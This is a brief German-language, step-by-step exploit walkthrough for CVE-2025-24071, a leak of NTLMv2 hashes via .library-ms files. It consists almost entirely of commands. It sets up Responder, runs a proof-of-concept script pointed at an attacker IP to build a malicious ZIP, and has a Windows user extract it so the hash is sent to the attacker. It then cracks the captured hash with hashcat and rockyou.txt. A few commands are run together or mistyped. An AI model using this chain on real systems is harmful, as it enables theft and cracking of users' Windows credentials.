
CVE-2025-24071: Offenlegung von NTLMv2-Hashes über .library-ms-Dateien
sudo apt update && sudo apt install responder -y
Starten Sie Responder
sudo responder -I eth0
Erforderliches Python-Modul installieren
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
Dies wird Folgendes generieren: testpayload.library-ms testpayload.zip
Übertragen Sie testpayload.zip auf den Windows 11-Testrechner. Extrahieren Sie die ZIP-Datei mit dem Windows Datei-Explorer. Dies veranlasst Windows, den SMB-Pfad zu versuchen, was das NTLM-Hash-Leck auslöst.
responder -I etho0

Erstellen Sie eine Datei hash.txt
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
Die gängigste: rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
